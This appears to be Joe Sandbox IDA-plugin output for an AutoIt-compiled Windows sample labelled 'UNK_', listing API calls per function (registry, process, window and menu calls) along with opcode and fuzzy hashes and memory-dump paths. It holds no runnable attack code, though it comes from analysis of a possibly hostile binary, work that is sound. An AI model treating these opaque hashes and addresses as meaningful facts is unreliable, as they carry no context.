                                                                                                                  • String ID:
                                                                                                                  • API String ID: 395352322-0
                                                                                                                  • Opcode ID: b1736b51668cb338188af47637d8481073899f30bd7c1db44c827cfd23dfd064
                                                                                                                  • Instruction ID: 03f6a251ee2532f1e85abcc6ee76ac2ad924db91e94dd314c8314e413d5237fd
                                                                                                                  • Opcode Fuzzy Hash: b1736b51668cb338188af47637d8481073899f30bd7c1db44c827cfd23dfd064
                                                                                                                  • Instruction Fuzzy Hash: D43107B1911209BFDB149B94DC89AFEB7BEEF08300F14416AE512E2250EA709F49DB71
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00DD8DF4
                                                                                                                  • GetWindowLongW.USER32(017AB198,000000F0), ref: 00DD8E27
                                                                                                                  • GetWindowLongW.USER32(017AB198,000000F0), ref: 00DD8E5C
                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00DD8E8E
                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00DD8EB8
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00DD8EC9
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DD8EE3
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2178440468-0
                                                                                                                  • Opcode ID: ea8b729462b1171e6ccecbdcafc2c3477cb49b85e30b30b1f1f4b6d995822d9a
                                                                                                                  • Instruction ID: 72207415a28ad21f255ece42594fddd56483db9303a4af6dda5c1f3ffeb5057b
                                                                                                                  • Opcode Fuzzy Hash: ea8b729462b1171e6ccecbdcafc2c3477cb49b85e30b30b1f1f4b6d995822d9a
                                                                                                                  • Instruction Fuzzy Hash: 4D313631600214AFDB26DF59DC84F653BA6FB4A314F1941AAF505CB3B2CB72A840EF60
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB1734
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB175A
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00DB175D
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00DB177B
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00DB1784
                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DB17A9
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00DB17B7
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761583154-0
                                                                                                                  • Opcode ID: 2a1032c49f4302918f859f62e2266ab4fb0bc37802898f0e41e595d219b61a98
                                                                                                                  • Instruction ID: 6868e08cb3d2007d201129d044e5dfb1a2bed149223f67605001a02f9de1bb29
                                                                                                                  • Opcode Fuzzy Hash: 2a1032c49f4302918f859f62e2266ab4fb0bc37802898f0e41e595d219b61a98
                                                                                                                  • Instruction Fuzzy Hash: 1A215179600319EF9B109BA8DC98DFF77EEEB09360B448125F916DB290DA70EC4187B0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D731DA
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00DB6A2B
                                                                                                                  • _wcscmp.LIBCMT ref: 00DB6A49
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00DB6A62
                                                                                                                    • Part of subcall function 00DB6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00DB6DBA
                                                                                                                    • Part of subcall function 00DB6D6D: GetLastError.KERNEL32 ref: 00DB6DC5
                                                                                                                    • Part of subcall function 00DB6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00DB6DD9
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6AA4
                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00DB6B0C
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 2323102230-1173974218
                                                                                                                  • Opcode ID: 23fecba9e863b6e73c4c995a2008f7a3f8b1656f0085d6eeedcc6621beb7a170
                                                                                                                  • Instruction ID: 9b01dd308116bd7c8d8c8c27690ee9d66288c7675b4c9194400c77460065058d
                                                                                                                  • Opcode Fuzzy Hash: 23fecba9e863b6e73c4c995a2008f7a3f8b1656f0085d6eeedcc6621beb7a170
                                                                                                                  • Instruction Fuzzy Hash: A0310271900219AACF51EFA4D845BDDB7B8AF08300F5495AAE50AE3141EB34DB89CF74
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: __wcsnicmp
                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                  • Opcode ID: 62f1bf04084be17e8d715623dc296ecf1703f89d045541e260e56c8b4defb455
                                                                                                                  • Instruction ID: c731c6716bd983bf2b3f6b8f8f05e861bd5c575c7c0a52adde85c52277641ad8
                                                                                                                  • Opcode Fuzzy Hash: 62f1bf04084be17e8d715623dc296ecf1703f89d045541e260e56c8b4defb455
                                                                                                                  • Instruction Fuzzy Hash: 77210732208611FAD731BA359C02EF7B3A8DF69310F144025F48797181EB919A82E3B1
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB180D
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00DB1833
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00DB1836
                                                                                                                  • SysAllocString.OLEAUT32 ref: 00DB1857
                                                                                                                  • SysFreeString.OLEAUT32 ref: 00DB1860
                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00DB187A
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00DB1888
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761583154-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00D8C657
                                                                                                                    • Part of subcall function 00D8C619: GetStockObject.GDI32(00000011), ref: 00D8C66B
                                                                                                                    • Part of subcall function 00D8C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D8C675
                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00DDA13B
                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00DDA148
                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00DDA153
                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00DDA162
                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00DDA16E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                  APIs
                                                                                                                  • __getptd_noexit.LIBCMT ref: 00D94C3E
                                                                                                                    • Part of subcall function 00D986B5: GetLastError.KERNEL32(?,00D90127,00D988A3,00D94673,?,?,00D90127,?,00D7125D,00000058,?,?), ref: 00D986B7
                                                                                                                    • Part of subcall function 00D986B5: __calloc_crt.LIBCMT ref: 00D986D8
                                                                                                                    • Part of subcall function 00D986B5: GetCurrentThreadId.KERNEL32 ref: 00D98701
                                                                                                                    • Part of subcall function 00D986B5: SetLastError.KERNEL32(00000000,00D90127,00D988A3,00D94673,?,?,00D90127,?,00D7125D,00000058,?,?), ref: 00D98719
                                                                                                                  • CloseHandle.KERNEL32(?,?,00D94C1D), ref: 00D94C52
                                                                                                                  • __freeptd.LIBCMT ref: 00D94C59
                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,00D94C1D), ref: 00D94C61
                                                                                                                  • GetLastError.KERNEL32(?,?,00D94C1D), ref: 00D94C91
                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,?,00D94C1D), ref: 00D94C98
                                                                                                                  • __freefls@4.LIBCMT ref: 00D94CB4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1445074172-0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DDE14D
                                                                                                                  • _memset.LIBCMT ref: 00DDE15C
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E33EE0,00E33F24), ref: 00DDE18B
                                                                                                                  • CloseHandle.KERNEL32 ref: 00DDE19D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                  • String ID: $?$>
                                                                                                                  • API String ID: 3277943733-2278415509
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00D8C6C0
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D8C701
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D8C729
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00D8C856
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D8C86F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1296646539-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3253778849-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                    • Part of subcall function 00DD3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DD2AA6,?,?), ref: 00DD3B0E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DD2FA0
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DD2FE0
                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00DD3003
                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00DD302C
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00DD306F
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00DD307C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4046560759-0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$_wcscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2037614760-0
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00DB2AF6
                                                                                                                  • VariantClear.OLEAUT32(00000013), ref: 00DB2B68
                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00DB2BC3
                                                                                                                  • _memmove.LIBCMT ref: 00DB2BED
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00DB2C3A
                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DB2C68
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1101466143-0
                                                                                                                  APIs
                                                                                                                  • GetMenu.USER32(?), ref: 00DD833D
                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00DD8374
                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DD839C
                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00DD840B
                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00DD8419
                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00DD846A
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 650687236-0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DB552E
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DB5579
                                                                                                                  • IsMenu.USER32(00000000), ref: 00DB5599
                                                                                                                  • CreatePopupMenu.USER32 ref: 00DB55CD
                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00DB562B
                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00DB565C
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3311875123-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00D8B1C1
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D8B225
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D8B242
                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00D8B253
                                                                                                                  • EndPaint.USER32(?,?), ref: 00D8B29D
                                                                                                                  Similarity
                                                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1827037458-0
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(00E31810,00000000,?,?,00E31810,00E31810,?,00DEE2D6), ref: 00DDE21B
                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00DDE23F
                                                                                                                  • ShowWindow.USER32(00E31810,00000000,?,?,00E31810,00E31810,?,00DEE2D6), ref: 00DDE29F
                                                                                                                  • ShowWindow.USER32(?,00000004,?,?,00E31810,00E31810,?,00DEE2D6), ref: 00DDE2B1
                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00DDE2D5
                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00DDE2F8
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 642888154-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D8B5EB
                                                                                                                    • Part of subcall function 00D8B58B: SelectObject.GDI32(?,00000000), ref: 00D8B5FA
                                                                                                                    • Part of subcall function 00D8B58B: BeginPath.GDI32(?), ref: 00D8B611
                                                                                                                    • Part of subcall function 00D8B58B: SelectObject.GDI32(?,00000000), ref: 00D8B63B
                                                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00DDE9F2
                                                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00DDEA06
                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DDEA14
                                                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00DDEA24
                                                                                                                  • EndPath.GDI32(00000000), ref: 00DDEA34
                                                                                                                  • StrokePath.GDI32(00000000), ref: 00DDEA44
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 43455801-0
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 00DAEFB6
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DAEFC7
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DAEFCE
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00DAEFD6
                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DAEFED
                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00DAEFFF
                                                                                                                    • Part of subcall function 00DAA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00DAA79D,00000000,00000000,?,00DAAB73), ref: 00DAB2CA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 603618608-0
                                                                                                                  • Opcode ID: 03ecf786864153b846b3d51d42857fcfcd12a2cdf3625fda6f35ee3a27b56e70
                                                                                                                  • Instruction ID: 553794c40f9c15dbc87c1a1271999c572979ec6e38d0b9674574f63e2699a5f8
                                                                                                                  • Opcode Fuzzy Hash: 03ecf786864153b846b3d51d42857fcfcd12a2cdf3625fda6f35ee3a27b56e70
                                                                                                                  • Instruction Fuzzy Hash: C1017175A00309BFEB109BA69C49A5EBFBAEF49351F048066FA04EB380D6709C01CB71
                                                                                                                  APIs
                                                                                                                  • __init_pointers.LIBCMT ref: 00D987D7
                                                                                                                    • Part of subcall function 00D91E5A: __initp_misc_winsig.LIBCMT ref: 00D91E7E
                                                                                                                    • Part of subcall function 00D91E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D98BE1
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D98BF5
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D98C08
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D98C1B
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D98C2E
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D98C41
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D98C54
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D98C67
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D98C7A
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D98C8D
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D98CA0
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D98CB3
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D98CC6
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D98CD9
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D98CEC
                                                                                                                    • Part of subcall function 00D91E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00D98CFF
                                                                                                                  • __mtinitlocks.LIBCMT ref: 00D987DC
                                                                                                                    • Part of subcall function 00D98AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00E2AC68,00000FA0,?,?,00D987E1,00D96AFA,00E267D8,00000014), ref: 00D98AD1
                                                                                                                  • __mtterm.LIBCMT ref: 00D987E5
                                                                                                                    • Part of subcall function 00D9884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00D989CF
                                                                                                                    • Part of subcall function 00D9884D: _free.LIBCMT ref: 00D989D6
                                                                                                                    • Part of subcall function 00D9884D: RtlDeleteCriticalSection.NTDLL(00E2AC68), ref: 00D989F8
                                                                                                                  • __calloc_crt.LIBCMT ref: 00D9880A
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D98833
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2942034483-0
                                                                                                                  • Opcode ID: e932b06750caf6f3cd20be81138e15b57d7ea06dd168a47feb686e8b9c79fb8a
                                                                                                                  • Instruction ID: 438c380cc286b0ae3b34412f45ceb7ce48e892b8444fa4ae360fc91141502008
                                                                                                                  • Opcode Fuzzy Hash: e932b06750caf6f3cd20be81138e15b57d7ea06dd168a47feb686e8b9c79fb8a
                                                                                                                  • Instruction Fuzzy Hash: F7F0E9331197115EEF7877B8BC0764A2AC0DF03F30B680A2AF464D50E2FF1088416170
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423608774-0
                                                                                                                  • Opcode ID: 4e19434cc251bdd979f0fe67dcee056fc04613a359e916b642e2a0397f066d9d
                                                                                                                  • Instruction ID: fe7ebeb5f953cfdb38f8505a902ae689c8a149842146cbbcace9c3bf46610519
                                                                                                                  • Opcode Fuzzy Hash: 4e19434cc251bdd979f0fe67dcee056fc04613a359e916b642e2a0397f066d9d
                                                                                                                  • Instruction Fuzzy Hash: EF018132101311EBD7152B98ED48EFF7BABFF8A702B444529F503D22A1CB64A801CBB1
                                                                                                                  APIs
                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D71898
                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D718A0
                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D718AB
                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D718B6
                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D718BE
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D718C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4278518827-0
                                                                                                                  • Opcode ID: 76aad8411a286c1bacac767c3b5b30a96854867f69a8bff389490eaf9a66c760
                                                                                                                  • Instruction ID: 88c5f6b26b33c1b646da49c462e6cbd3afcd914d5b33a76f373347f5142bf372
                                                                                                                  • Opcode Fuzzy Hash: 76aad8411a286c1bacac767c3b5b30a96854867f69a8bff389490eaf9a66c760
                                                                                                                  • Instruction Fuzzy Hash: F00144B0902B5ABDE3008F6A8C85A52FEA8FF19354F04411BA15C87A42C7B5A864CBE5
                                                                                                                  APIs
                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DB8504
                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DB851A
                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00DB8529
                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DB8538
